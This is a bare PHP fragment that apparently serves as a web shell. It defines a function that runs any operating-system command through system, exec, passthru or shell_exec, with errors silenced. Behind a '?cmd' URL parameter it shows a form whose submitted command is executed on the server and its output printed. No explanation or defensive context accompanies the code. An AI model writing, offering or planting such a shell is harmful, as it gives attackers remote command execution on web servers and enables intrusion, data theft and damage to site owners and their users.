function exe($cmd) {
	if(function_exists('system')) { 		
		@ob_start(); 		
		@system($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('exec')) { 		
		@exec($cmd,$results); 		
		$buff = ""; 		
		foreach($results as $result) { 			
			$buff .= $result; 		
		} return $buff; 	
	} elseif(function_exists('passthru')) { 		
		@ob_start(); 		
		@passthru($cmd); 		
		$buff = @ob_get_contents(); 		
		@ob_end_clean(); 		
		return $buff; 	
	} elseif(function_exists('shell_exec')) { 		
		$buff = @shell_exec($cmd); 		
		return $buff; 	
	} 
}
if(isset($_GET['cmd'])){
	echo dirname(__FILE__);
	echo '
	<form action="?cmd" method="post">
	<input type="text" name="cmd"/>  
	<input type="submit" value="Run" name="submit"/>
	</form>';
	if($_POST['cmd']) {
		echo "<pre>$ ".$_POST['cmd']."<br>".exe($_POST['cmd'])."</pre>";
	}
	exit();
}
